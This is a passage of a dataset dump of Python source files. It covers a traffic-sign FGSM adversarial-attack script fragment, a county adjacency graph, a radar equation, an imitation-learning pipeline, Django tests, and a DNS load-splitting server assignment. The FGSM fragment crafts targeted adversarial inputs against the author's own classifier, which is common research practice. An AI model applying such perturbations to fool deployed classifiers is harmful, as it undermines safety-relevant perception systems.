0.390349, 0.438721), (0.248148, 0.230837, 0.237781))])\n\n img = Image.open(args.test_file)\n img_rgb = transform(img.convert(\"RGB\"))\n img_input = img_rgb.view(1, 3, 48, 48).to(device)\n\n fgsm_targeted_attack(model, args.test_file.split(\"/\")[-1], img_input, getindex(args.original_label), getindex(args.targeted_label))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--checkpoint', type=str, required=False)\n parser.add_argument('--test_file', type=str, required=False)\n parser.add_argument('--original_label', type=str, required=False)\n parser.add_argument('--targeted_label', type=str, required=False)\n args = parser.parse_args()\n main(args)\n","sub_path":"traffic-sign-classification/3-attack/fgsm_cnn.py","file_name":"fgsm_cnn.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61392145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 25 23:35:52 2015\n\n@author: Alan\n\"\"\"\n\nimport shapefile as sf\nimport pandas as pd\nimport networkx as nx\n\ndistricts = sf.Reader('cb_2013_us_county_500k')\n\nshapes = districts.shapes()\nrecords = districts.records()\n\ndf = pd.DataFrame(records, columns = [districts.fields[i][0] for i in range(1, len(districts.fields))])\n\ng = nx.Graph()\ng.position = {}\ng.area = {}\n\nidnum = 4\n\nclass Bbox(object):\n \n def __init__(self, coords):\n self.x1 = coords[0]\n self.x2 = coords[2]\n self.y1 = coords[1]\n self.y2 = coords[3]\n \n self.p1 = (self.x1, self.y1)\n self.p2 = (self.x2, self.y2)\n \n def middle(self):\n return ((self.x1 + self.x2)/2, (self.y1 + self.y2)/2)\n \n def isin(self, b):\n \n def p_in(x,y):\n x_in = (b.x1 < x < b.x2) or (b.x1 > x > b.x2)\n y_in = (b.y1 < y < b.y2) or (b.y1 > y > b.y2)\n return x_in and y_in\n \n return p_in(self.x1, self.y1) or p_in(self.x2, self.y2) or p_in(self.x1, self.y2) or p_in(self.x2, self.y1)\n\nfor i in range(len(records)):\n district = records[i][idnum]\n g.add_node(district)\n bbox = Bbox(shapes[i].bbox)\n g.position[district] = bbox.middle()\n g.area[district] = sum(records[i][7:8])\n \nfor i in range(len(records)):\n district_i = records[i][idnum]\n bbox_i = Bbox(shapes[i].bbox)\n for j in range(len(records)):\n district_j = records[j][idnum]\n bbox_j = Bbox(shapes[j].bbox)\n if i != j:\n if bbox_j.isin(bbox_i):\n g.add_edge(district_i, district_j)\n \nG = nx.connected_component_subgraphs(g).next()\nareas = [g.area[v] for v in G]\nm = max(areas)\nnode_color = [float(g.degree(v)) for v in g]\nnode_size = [g.area[v]/m*1000+300 for v in g]\nnx.draw_networkx(g, pos=g.position, with_labels=False, node_color = node_color, node_size = node_size)","sub_path":"attempt3.py","file_name":"attempt3.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"602163923","text":"from __future__ import print_function\nfrom numpy import log10\nfrom numpy.testing import assert_almost_equal\n\n\ndef findPr(Z=None,K2=None,La=None,R=None,R1=None,Pt=None,b=None,Z1=None):\n \"\"\"\n solve stull radar eqn 8.23\n\n Parameters\n ----------\n\n Z: float \n Reflectivity (mm^6/m^3) \n K2: float\n Squared index of refraction (unitless) \n La: float\n one-way attenuatio (unitless)\n R: float\n range to target (km)\n R1: float\n range factor, km, Stull 8.25\n Pt: float\n transmitted power, W, stull p. 246\n b: float\n equipment factor, Stull 8.26\n\n Returns\n -------\n\n Pr: float\n returned power (Watts)\n \"\"\" \n Pr=Pt*b*K2/La**2.*(R1/R)**2.*Z\n return Pr\n\ndef test_stull():\n #coefficents for nexrad\n R1=2.17e-10#range factor, km, Stull 8.25\n Pt=750.e3 #transmitted power, W, stull p. 246\n b=14255 #equipment factor, Stull 8.26\n Z=1.e4 #Z of 40 dbZ\n R=20 #range of 20 km\n K2=0.93 #liquid water\n La=1 #no attenuation\n nexrad=dict(R1=R1,Pt=Pt,b=b,Z=Z,R=R,K2=K2,La=La)\n #\n # pass a dictionary with keyword arguments to a function\n #\n power_watts=findPr(**nexrad)\n assert_almost_equal(power_watts,1.1705e-8,decimal=4)\n return power_watts\n \n\nif __name__==\"__main__\":\n #stull p. 246 sample appliation\n power_watts = test_stull()\n #\n # demonstrate how to print dictionary keys into a piece of text\n #\n the_text=\"\"\"\n Stull problem on p. 246: start with 40 dbZ at 20 km and\n find Pr:\n Here is the Pr: {Prval:10.5g} Watts\n Here is dbm -- decibels re 1 mWatt: {dBm:5.3f},\n \"\"\"\n values={'Prval':power_watts,'dBm':10*log10(power_watts*1.e3)}\n print(the_text.format_map(values))\n \n","sub_path":"a301examples/stull_radar.py","file_name":"stull_radar.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633094000","text":"from BASE import BASE \nfrom BASE import MultiOutputTransform\nfrom sklearn.svm import SVC\nimport numpy as np\n\nclass SVM(BASE):\n\n def __init__(self,X,y, C=[1.,1.], class_weight=None, kernel='rbf', **kwargs):\n BASE.__init__(self, X, y, **kwargs)\n self.type='classification'\n self.class_weight = class_weight\n self.kernel = kernel \n self.C_default = []\n if self.kernel=='linear':\n self.C_default=np.power(10.,np.arange(-6,12))\n else:\n for a in np.power(10.,np.arange(-3,4)):\n for gamma in np.power(10.,np.arange(-3,4)):\n self.C_default.append([a,gamma])\n self.C = C\n\n def fit(self, X, y, lock=None):\n \"\"\"\n \"\"\"\n\n X = np.vstack(X)\n y = np.vstack(y)\n y = MultiOutputTransform(self.enc, y)\n\n self.MO_clf = []\n\n if self.kernel=='linear':\n for y_ in y.T:\n clf = SVC(\n C=self.C,\n # gamma=self.C[1],\n verbose=self.verbose,\n max_iter = self.max_iter,\n kernel=self.kernel,\n class_weight=self.class_weight,\n )\n clf.fit(X, y_)\n self.MO_clf.append(clf)\n else:\n for y_ in y.T:\n clf = SVC(\n C=self.C[0],\n gamma=self.C[1],\n verbose=self.verbose,\n max_iter = self.max_iter,\n kernel=self.kernel,\n class_weight=self.class_weight,\n )\n clf.fit(X, y_)\n self.MO_clf.append(clf)\n\n return self\n","sub_path":"sewa/mula_learn/models/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379796093","text":"from mjrl.algos.dagger import Dagger\nfrom torch.utils.data import DataLoader\nfrom visual_im.settings import *\nfrom visual_im.data_gen.transforms import *\nimport os\nfrom mjrl.utils.train_agent import train_agent\nimport argparse\nfrom mjrl.policies.gaussian_mlp import MLP\nfrom mjrl.baselines.mlp_baseline import MLPBaseline\nfrom mjrl.algos.npg_cg import NPG\nimport mjrl.envs\nfrom mjrl.utils.gym_env import GymEnv\nimport time as timer\nfrom mjrl.algos.behavior_cloning import BC\nfrom mjrl.policies.gaussian_cnn import CNN\nfrom torchvision import transforms\nimport glob\nimport json\nimport numpy as np\nfrom mjrl.samplers.base_sampler import do_rollout\nimport pickle\nfrom visual_im.data_gen.dataset import PathDataset, get_dataset_from_files\nfrom gym.envs.registration import register\n\nconfig = dict(\n# used got training expert policy\ndelta = 0.01,\ntraj_budget_expert = 12500,\n#traj_budget_expert = 10,\nnum_traj_expert= 50,\n# num_traj_expert= 2,\n\n# used for gen data\ntrain_traj_per_file= 50,\n#train_traj_per_file= 1,\nnum_files_train= 1,\nval_traj_per_file = 5,\n#val_traj_per_file = 1,\nnum_files_val= 1,\n\n# used for BC\nbatch_size_viz_pol = 128,\n#batch_size_viz_pol = 64,\nbc_epoch = 20,\n#bc_epoch = 1,\nlr=0.0003,\n\n# used for DAgger\ndagger_epoch=10,\n#dagger_epoch=1,\nbeta_decay=0.9,\n# set the window to 0 for aggregation\nsliding_window=100,\ngen_traj_dagger_ep=50,\neval_num_traj=100,\ntrainer_epochs=5,\nuse_tactile=True,\nuse_late_fusion=True\n)\n\n\n\ndef train_expert_policy():\n config['expert_policy_folder'] = '%s_expert' % config['env_name']\n\n print('-' * 80)\n if os.path.exists(get_expert_policy_path(config['env_name'])):\n print('Expert policy already exists')\n return\n print('Training expert policy now')\n\n e = make_gym_env(ENV_ID[config['env_name']])\n policy = MLP(e.spec, hidden_sizes=(128, 128), seed=config['seed'])\n baseline = MLPBaseline(e.spec)\n agent = NPG(e, policy, baseline, seed=config['seed'], save_logs=True, normalized_step_size=config['delta'])\n\n job_name = os.path.join(config['main_dir'], config['expert_policy_folder'])\n ts = timer.time()\n train_agent(job_name=ensure_dir(job_name),\n agent=agent,\n seed=config['seed'],\n niter=int(config['traj_budget_expert'] / config['num_traj_expert']),\n gamma=0.99995,\n gae_lambda=0.97,\n num_cpu=10,\n sample_mode='trajectories',\n num_traj=config['num_traj_expert'],\n save_freq=5,\n evaluation_rollouts=10)\n print(\"time taken = %f\" % (timer.time() - ts))\n del(e)\n\ndef gen_data_from_expert():\n print('-' * 80)\n\n train_dir = os.path.join(config['main_dir'], 'train_data')\n val_dir = os.path.join(config['main_dir'], 'val_data')\n\n e = make_gym_env(config['env_id_il'])\n gen_data(e, train_dir, config['num_files_train'], config['train_traj_per_file'])\n gen_data(e, val_dir, config['num_files_val'], config['val_traj_per_file'])\n\n del(e)\n\n\ndef do_bc():\n config['viz_policy_folder_bc'] = 'bc_%s_viz_policy' % config['env_name']\n viz_policy_folder_bc = os.path.join(config['main_dir'], config['viz_policy_folder_bc'])\n\n print('-' * 80)\n if os.path.exists(viz_policy_folder_bc):\n print('BC: Viz policy already exists')\n return\n print('BC: Training viz policy now')\n\n ensure_dir(viz_policy_folder_bc)\n train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset = get_dataloaders_datasets()\n\n # policy = MLP(e.spec, hidden_sizes=(64,64), seed=SEED)\n e = make_gym_env(config['env_id_il'])\n robot_info_dim=None\n if config['has_robot_info']:\n robot_info_dim=e.env.env.robot_info_dim\n policy = CNN(action_dim=transformed_train_dataset.action_dim, use_seq=True, seed=config['seed'], robot_info_dim=robot_info_dim, action_stats=transformed_train_dataset.get_action_stats(), robot_info_stats=transformed_train_dataset.get_robot_info_stats(), use_late_fusion=config['use_late_fusion'])\n\n ts = timer.time()\n\n # TODO: add the list of full path to the pickles\n\n # SGD w/ momentum (using momentum = 0.9 AND Nesterov)\n # optimizer = torch.optim.SGD(policy.trainable_params, lr=args.lr, momentum=0.9, nesterov=True)\n # bc_algo = BC(dataloader, policy, args.id, epochs=args.ep, optimizer=optimizer, lr=args.lr)\n\n expert_policy = pickle.load(open(get_expert_policy_path(config['env_name']), 'rb'))\n # bc_algo = BC(train_dataloader=train_dataloader,\n # val_dataloader=val_dataloader,\n # expert_policy=expert_policy,\n # policy=policy,\n # log_dir=os.path.join(config['id'], 'bc'),\n # camera_name=CAMERA_NAME[config['env_name']],\n # epochs=config['bc_epoch'],\n # lr=config['lr'],\n bc_algo = Dagger(\n dagger_epochs=config['bc_epoch'],\n expert_policy=expert_policy,\n viz_policy=policy,\n old_data_loader=train_dataloader,\n val_data_loader=val_dataloader,\n log_dir=os.path.join(config['id'], 'bc'),\n pol_dir_name=viz_policy_folder_bc,\n save_epoch=1,\n beta_decay=1.0,\n env=e,\n num_traj_gen=config['gen_traj_dagger_ep'],\n camera_name=config['camera_name'],\n has_robot_info=config['has_robot_info'],\n seed=config['seed'] + (config['num_files_train'] * config['train_traj_per_file']),\n lr=config['lr'],\n trainer_epochs=config['trainer_epochs'],\n eval_num_traj=config['eval_num_traj'],\n sliding_window=config['sliding_window'],\n device_id=config['device_id'])\n\n bc_algo.train()\n print(\"time taken = %f\" % (timer.time() - ts))\n del (e)\n\n\ndef do_dagger():\n config['viz_policy_folder_dagger'] = 'dagger_%s_viz_policy' % config['env_name']\n viz_policy_folder_dagger = os.path.join(config['main_dir'], config['viz_policy_folder_dagger'])\n\n print('-' * 80)\n if os.path.exists(viz_policy_folder_dagger):\n print('DAgger: Viz policy already exists')\n return\n print('DAgger: Training viz policy now')\n\n ensure_dir(viz_policy_folder_dagger)\n train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset = get_dataloaders_datasets()\n\n # policy = MLP(e.spec, hidden_sizes=(64,64), seed=SEED)\n e = make_gym_env(config['env_id_il'])\n robot_info_dim = None\n if config['has_robot_info']:\n robot_info_dim = e.env.env.robot_info_dim\n policy = CNN(action_dim=transformed_train_dataset.action_dim, use_seq=True, robot_info_dim=robot_info_dim, action_stats=transformed_train_dataset.get_action_stats(), robot_info_stats=transformed_train_dataset.get_robot_info_stats(), use_late_fusion=config['use_late_fusion'])\n\n ts = timer.time()\n\n expert_policy = pickle.load(open(get_expert_policy_path(config['env_name']), 'rb'))\n dagger_algo = Dagger(\n dagger_epochs=config['dagger_epoch'],\n expert_policy=expert_policy,\n viz_policy=policy,\n old_data_loader=train_dataloader,\n val_data_loader=val_dataloader,\n log_dir=os.path.join(config['id'], 'dagger'),\n pol_dir_name=viz_policy_folder_dagger,\n save_epoch=1,\n beta_decay=config['beta_decay'],\n beta_start=config['beta_start'],\n env=e,\n lr=config['lr'],\n num_traj_gen=config['gen_traj_dagger_ep'],\n camera_name=config['camera_name'],\n has_robot_info = config['has_robot_info'],\n seed=config['seed'] + (config['num_files_train'] * config['train_traj_per_file']),\n trainer_epochs=config['trainer_epochs'],\n eval_num_traj=config['eval_num_traj'],\n sliding_window=config['sliding_window'],\n device_id=config['device_id'])\n\n dagger_algo.train()\n trained_policy = dagger_algo.viz_policy\n\n print(\"time taken = %f\" % (timer.time() - ts))\n del(e)\n\ndef main():\n parser = argparse.ArgumentParser(description='Running the whole pipeline got the given agent')\n parser.add_argument('-env', metavar='ENV', type=str,\n help='The env for which the experiment needs to be run')\n parser.add_argument('-seed', metavar='SEED', type=int,\n help='Seed', default=500)\n parser.add_argument('-id', metavar='ID', type=str,\n help='Id for this run', default='')\n parser.add_argument('-horizon', metavar='HORIZON', type=int,\n help='Horizon for the IL un-rollment', default=150)\n parser.add_argument('-betadecay', metavar='BETA', type=float,\n help='beta decay', default=0.9)\n parser.add_argument('-use_tactile', metavar='BOOL', type=str,\n help='use tactile or not, use True/False', default='True')\n parser.add_argument('-use_late_fusion', metavar='BOOL', type=str,\n help='use late fusion or not, use True/False', default='True')\n parser.add_argument('-ep', metavar='EPOCH', type=int,\n help='dagger epoch', default=10)\n parser.add_argument('-cam', metavar='CAM', type=str,\n help='camera view point', default='vil_camera')\n parser.add_argument('-device_id', metavar='DEV_ID', type=int,\n help='device id (cuda)', default=0)\n parser.add_argument('-init_traj', metavar='INIT_TRAJ', type=int,\n help='number of inital trajectories', default=50)\n parser.add_argument('-num_files', metavar='NUM_FILES', type=int,\n help='number of training', default=1)\n parser.add_argument('-epoch_traj', metavar='EPOCH_TRAJ', type=int,\n help='number of trajectories generated in one dagger epoch', default=50)\n parser.add_argument('-fit_ep', metavar='FIT_EP', type=int,\n help='number of fitting epochs', default=5)\n parser.add_argument('-window', metavar='WINDOW', type=int,\n help='size of sliding window', default=100)\n parser.add_argument('-eval_traj', metavar='EVAL_TRAJ', type=int,\n help='number of trajectories to evaluate on per epoch', default=100)\n parser.add_argument('-betastart', metavar='BETA', type=float,\n help='beta start', default=1.0)\n\n args = parser.parse_args()\n main_dir = os.path.join(DATA_DIR, '%s_%s' % (args.env, args.id))\n\n config['device_id'] = args.device_id\n config['env_name'] = args.env\n config['main_dir'] = main_dir\n config['id'] = '%s_id_%s' % (args.env, args.id)\n config['seed'] = args.seed\n config['env_id_il'] = \"il_%s\" % ENV_ID[config['env_name']]\n config['camera_name'] = args.cam\n\n # config stuff\n config['train_traj_per_file'] = args.init_traj // args.num_files\n config['num_files_train'] = args.num_files\n config['dagger_epoch'] = args.ep\n config['beta_decay'] = args.betadecay\n config['beta_start'] = args.betastart\n config['sliding_window'] = args.window\n config['gen_traj_dagger_ep'] = args.epoch_traj\n config['eval_num_traj'] = args.eval_traj\n config['trainer_epochs'] = args.fit_ep\n\n if args.use_tactile != 'False' and args.use_tactile != 'True':\n print('incorrect argument')\n exit(0)\n if args.use_late_fusion != 'False' and args.use_late_fusion != 'True':\n print('incorrect argument')\n exit(0)\n\n config['use_tactile'] = args.use_tactile == 'True'\n ts = timer.time()\n\n config['horizon_il'] = args.horizon\n config['use_late_fusion'] = args.use_late_fusion == 'True'\n register_env()\n\n train_expert_policy()\n print()\n gen_data_from_expert()\n print()\n # do_bc()\n # print()\n do_dagger()\n print()\n\n config_file = os.path.join(main_dir, 'config.json')\n\n with open(config_file, 'w') as fp:\n json.dump(config, fp)\n\n print('Done with all steps')\n print('total time taken = %f' % (timer.time() - ts))\n\ndef get_dataloaders_datasets():\n train_dir = os.path.join(config['main_dir'], 'train_data')\n val_dir = os.path.join(config['main_dir'], 'val_data')\n\n train_path_files = glob.glob(os.path.join(train_dir, '*'))\n val_path_files = glob.glob(os.path.join(val_dir, '*'))\n\n transforms_list = [ClipAction(), ToCudaTensor()]\n\n transformed_train_dataset = get_dataset_from_files(train_path_files, transform=transforms.Compose(transforms_list))\n transformed_val_dataset = get_dataset_from_files(val_path_files, transform=transforms.Compose(transforms_list))\n\n train_dataloader = DataLoader(transformed_train_dataset, batch_size=config['batch_size_viz_pol'], shuffle=True,\n num_workers=4)\n val_dataloader = DataLoader(transformed_val_dataset, batch_size=config['batch_size_viz_pol'], shuffle=True,\n num_workers=4)\n return train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset\n\ndef gen_data(env, data_dir, num_files, trajs_per_file):\n if os.path.exists(data_dir):\n print('%s folder already exists' % os.path.basename(data_dir))\n return\n\n ensure_dir(data_dir)\n print('Generating %s' % os.path.basename(data_dir))\n expert_policy_path = get_expert_policy_path(config['env_name'])\n expert_policy = pickle.load(open(expert_policy_path, 'rb'))\n\n\n for i in range(num_files):\n seed = config['seed'] + i * trajs_per_file\n paths = np.array(do_rollout(N=trajs_per_file, policy=expert_policy, env=env, pegasus_seed=seed, use_mean=True, save_img=True, camera_name=config['camera_name'], device_id=config['device_id']))\n train_file = os.path.join(data_dir,'train_paths_%s_batch_%d.pickle' % (config['env_name'], i))\n pickle.dump(paths, open(train_file, 'wb'))\n\ndef make_gym_env(id):\n e = GymEnv(id, use_tactile=config['use_tactile'])\n config['has_robot_info'] = e.has_robot_info_attr()\n config['env_spec'] = e.spec.as_dict()\n return e\n\ndef ensure_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n return directory\n\ndef get_expert_policy_path(env_name):\n exp_p_p = os.path.join(EXPERT_POLICIES_DIR, EXPERT_POLICIES[env_name])\n print('Using: %s' % exp_p_p)\n return exp_p_p\n\ndef register_env():\n register(\n id=config['env_id_il'],\n entry_point=ENTRY_POINT[config['env_name']],\n max_episode_steps=config['horizon_il'],\n )\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"visual_im/run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":14425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"642790535","text":"from django.test import TestCase, tag\nfrom django.contrib.auth import get_user_model\n\nfrom voting_app.models import Poll, Choice\n\n\nUser = get_user_model()\n\nTEST_USER = {\n 'username': 'konni',\n 'email': 'test@test.com',\n 'password': 'q,1234',\n}\n\nTEST_POLL = {\n 'description': 'What fruit below do you like most?',\n}\n\n\nTEST_CHOICES = [\n {\n 'text': 'apple',\n 'total': 3,\n },\n {\n 'text': 'pear',\n 'total': 5,\n },\n {\n 'text': 'watermelon',\n 'total': 10,\n },\n]\n\n\ndef create_or_get_user(data=None):\n if User.objects.count() == 0:\n if not data:\n data = TEST_USER\n\n user = User.objects.create_user(**data)\n return user\n\n return User.objects.first()\n\n\ndef create_a_poll():\n poll = Poll()\n for key, value in TEST_POLL.items():\n setattr(poll, key, value)\n\n user = create_or_get_user()\n poll.author = user\n poll.save()\n return poll\n\n\nclass PollModelTest(TestCase):\n\n def test_create_and_retrieve_poll(self):\n poll = Poll()\n for key, value in TEST_POLL.items():\n setattr(poll, key, value)\n\n user = create_or_get_user()\n poll.author = user\n poll.save()\n\n self.assertEqual(Poll.objects.count(), 1)\n\n poll = Poll.objects.first()\n for key, value in TEST_POLL.items():\n self.assertEqual(getattr(poll, key), value)\n\n def test_valid_poll_should_has_more_than_one_choice(self):\n poll = create_a_poll()\n self.assertEqual(Poll.valid_polls().count(), 0)\n\n for i in range(3):\n choice = Choice.objects.create(text='test choice', poll=poll)\n\n self.assertEqual(Poll.valid_polls().count(), 1)\n\n def test_polls_should_in_reverse_modified_order(self):\n poll_1 = create_a_poll()\n poll_2 = create_a_poll()\n\n polls = Poll.objects.all()\n\n self.assertEqual(poll_2, polls[0])\n self.assertEqual(poll_1, polls[1])\n\n\nclass ChoiceModelTest(TestCase):\n\n def test_create_and_retrieve_choice(self):\n poll = create_a_poll()\n choice = Choice()\n for key, value in TEST_CHOICES[0].items():\n setattr(choice, key, value)\n choice.poll = poll\n choice.save()\n\n self.assertEqual(Choice.objects.count(), 1)\n\n choice = Choice.objects.first()\n for key, value in TEST_CHOICES[0].items():\n self.assertEqual(getattr(choice, key), value)\n\n def test_default_total_is_zero(self):\n poll = create_a_poll()\n Choice.objects.create(text='test choice', poll=poll)\n choice = Choice.objects.get(text='test choice')\n\n self.assertEqual(choice.total, 0)\n\n def test_add_choices_to_poll(self):\n poll = create_a_poll()\n for choice_data in TEST_CHOICES:\n choice = Choice()\n\n for key, value in choice_data.items():\n setattr(choice, key, value)\n\n choice.poll = poll\n choice.save()\n\n self.assertEqual(poll.choice_set.count(), 3)\n","sub_path":"voting_app/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148089937","text":"'''\r\n@author: Karun Kanda (kk951)\r\n@author: Shila Basu (sb1825)\r\n'''\r\n\r\nimport select, socket, sys, time\r\n\r\nHOST = '' # Standard loopback interface address (localhost)\r\nPORT = int(sys.argv[1]) # Port to listen on (non-privileged ports are > 1023)\r\nTS1_HOST = sys.argv[2] # TS1 hostname\r\nTS1_PORT = int(sys.argv[3]) # TS1 port number\r\nTS2_HOST = sys.argv[4] # TS2 hostname\r\nTS2_PORT = int(sys.argv[5]) # TS2 port number\r\nTS_TIMEOUT = 5 # time out for both the TS servers\r\nt_start = -1 # start time for getting the response\r\n\r\n'''\r\nClientRequest class\r\n\r\nDescription: A class to store the client requests and help enable to send a response within a certain amount of time.\r\nThen give the response back via the LS server socket.\r\n'''\r\nclass ClientRequest:\r\n time_start = -1\r\n response = ''\r\n def __init__(self,time,resp):\r\n self.time_start = time\r\n self.response = resp\r\n def __str__(self):\r\n return \"Start Time: \" + str(self.time_start) + \" Response: \" + str(self.response)\r\n\r\n'''\r\nMsgQueue class\r\n\r\nDescription: A class to store the messages the LS server recieves from the TS servers to send back later to the \r\nclient.\r\n'''\r\nclass MsgQueue:\r\n\r\n def __init__(self):\r\n self.queue_list = []\r\n\r\n def put(self, entry):\r\n self.queue_list.insert(0,entry)\r\n\r\n def get(self):\r\n return self.queue_list.pop()\r\n\r\n def empty(self):\r\n return len(self.queue_list) == 0\r\n\r\n def clear(self):\r\n self.queue_list = []\r\n\r\n'''\r\nls_server takes in no arguments and holds the main logic behind the LS server. Upon starting the main logic of the LS server it creates the LS server socket and \r\nthe two client sockets to connect to the TS servers. Something new about these connections are they are set with timeouts because we don't want to over work the \r\nconnection between the client and the server. \r\n\r\nThe purpose of this method is to get the requested response from the TS servers according to who has the information the client needs. The LS server gets the requested\r\nhostname from the client and sends it to the TS_1 server and TS_2 server. Then according to the timeout whoever has the information that information from the recv call \r\nis stored into a reply type variable which is sent back in the form:\r\nHostname IP Address A\r\nThen if there is no response from either TS_1 or TS_2 the LS server sends back:\r\nERROR:Host Not Found\r\nRight at the end of the requesting process.\r\n'''\r\ndef ls_server():\r\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server.setblocking(0)\r\n server.bind((HOST, PORT))\r\n server.listen(1)\r\n\r\n ts1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n ts1.settimeout(TS_TIMEOUT)\r\n ts1.connect((TS1_HOST, TS1_PORT))\r\n\r\n ts2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n ts2.settimeout(TS_TIMEOUT)\r\n ts2.connect((TS2_HOST, TS2_PORT))\r\n\r\n client = None\r\n inputs = [server,ts1,ts2] #List sockets to wait for\r\n outputs = []\r\n msg_queues = {}\r\n msg_queues[ts1] = MsgQueue()\r\n msg_queues[ts2] = MsgQueue()\r\n\r\n ip_requests = {}\r\n\r\n while inputs:\r\n readable, writable, exceptional = select.select(\r\n inputs, outputs, [],TS_TIMEOUT)\r\n\r\n for s in readable:\r\n if s is server:\r\n #Connect to client\r\n client, client_address = s.accept()\r\n client.setblocking(0)\r\n inputs.append(client) #Add input for client msgs\r\n msg_queues[client] = MsgQueue()\r\n print(\"Established Connection:\",client_address)\r\n else:\r\n #Read incoming data\r\n print()\r\n print(\"Receiving Message.....\")\r\n data = s.recv(1024)\r\n\r\n if data:\r\n if s is client:\r\n #Request for ip has been sent from client\r\n #Set ts1 and ts2 sockets for writing\r\n outputs.append(ts1)\r\n outputs.append(ts2)\r\n\r\n #Add messages to queue\r\n msg_queues[ts1].put(data)\r\n msg_queues[ts2].put(data)\r\n\r\n #Add to request list to keep track of timeouts\r\n t_start = time.time()\r\n ip_requests[data] = ClientRequest(t_start,b'')\r\n\r\n print(\"Client IP Request:\", data, ip_requests[data])\r\n\r\n # Set client socket to keep checking for fulfilled request\r\n outputs.append(client)\r\n msg_queues[client].put(data)\r\n else:\r\n #TS1 or TS2 has sent a reply\r\n #Parse the data find the domain name\r\n data_str = data.decode(\"UTF-8\").strip()\r\n b_domain_str = data_str.split()[0].encode('utf-8')\r\n t_start = ip_requests[b_domain_str].time_start\r\n\r\n #update ip_requests to show that it has been fulfilled\r\n ip_requests[b_domain_str] = ClientRequest(t_start, data)\r\n print(\"IP Request Fulfilled:\",b_domain_str,ip_requests[b_domain_str])\r\n else:\r\n # No data from socket means no connection\r\n # Clean up and close the connection\r\n print(\"CONNECTION LOST\")\r\n if s in outputs:\r\n outputs.remove(s)\r\n inputs.remove(s)\r\n s.close()\r\n msg_queues[s].clear()\r\n\r\n #print(ip_requests)\r\n\r\n for s in writable:\r\n #send data for every socket in writable\r\n if (not msg_queues[s].empty()):\r\n next_msg = msg_queues[s].get()\r\n if s is client:\r\n cr = ip_requests[next_msg]\r\n # Check to see if ip_requests has been fulfilled\r\n #If not, check the timestamp in ip_requests to see if it has timed out\r\n #If not, place it back in the queus and try later\r\n print(cr.response)\r\n if cr.response != b'':\r\n s.send(cr.response)\r\n print()\r\n print(\"Sending response to client\", cr.response)\r\n elif (time.time() - cr.time_start) > TS_TIMEOUT:\r\n error_msg = next_msg.decode('utf-8') + \" - Error:HOST NOT FOUND\"\r\n s.send(error_msg.encode('utf-8'))\r\n del ip_requests[next_msg]\r\n print()\r\n print(\"Sending timeout error to client\", next_msg + \" - Error:HOST NOT FOUND\")\r\n else:\r\n msg_queues[s].put(next_msg)\r\n else:\r\n #Send message to TS1 or TS2\r\n s.send(next_msg)\r\n print(\"Sending to TS\", next_msg.decode(\"UTF-8\"))\r\n else:\r\n #if there are no messages for the socket remove it from the output socket list\r\n if (s in outputs):\r\n outputs.remove(s)\r\n\r\n'''\r\nThis is the main method of ls.py where ls.py is expecting six arguments to start successfully.\r\n'''\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 6:\r\n print(\"Incorrect Usage: python ls.py \")\r\n sys.exit(1)\r\n ls_server()\r\n\r\n\r\n","sub_path":"ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"456743685","text":"import theano.tensor as T\nimport lasagne\n\n\ndef stack_rnn(l_emb, l_mask, num_layers, num_units,\n grad_clipping=10, dropout_rate=0.,\n bidir=True,\n name='',\n rnn_layer=lasagne.layers.LSTMLayer):\n \"\"\"\n Stack multiple RNN layers.\n \"\"\"\n\n def _rnn(backwards=True, name=''):\n network = l_emb\n for layer in range(num_layers):\n if dropout_rate > 0:\n network = lasagne.layers.DropoutLayer(network, p=dropout_rate)\n network = rnn_layer(network, num_units,\n grad_clipping=grad_clipping,\n mask_input=l_mask,\n backwards=backwards,\n name=name + '_layer' + str(layer + 1))\n return network\n\n network = _rnn(True, name)\n if bidir:\n network = lasagne.layers.ConcatLayer([network, _rnn(False, name + '_back')], axis=-1)\n return network\n","sub_path":"nn_lasagne/src/similarity/lasagne_rnn_layer.py","file_name":"lasagne_rnn_layer.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454616485","text":"# publisher/forms.py\nfrom django import forms\nfrom models import Publisher\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass PublisherForm(forms.ModelForm):\n\n class Meta:\n model = Publisher\n fields = ('name_publisher', 'is_active')\n labels = {\n 'name_publisher': _('Publisher Name'),\n 'is_active': _('Is Active?'),\n }\n","sub_path":"publisher/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"528723626","text":"#!/usr/bin/env python\n\n# run the continuous integration process\n# includes watching the git repo for pull requests and commits\n\nimport os\nimport sys\nimport requests\nimport json\nfrom time import sleep, gmtime, strftime\nfrom subprocess import call, check_output, CalledProcessError\n\nrepo_owner = 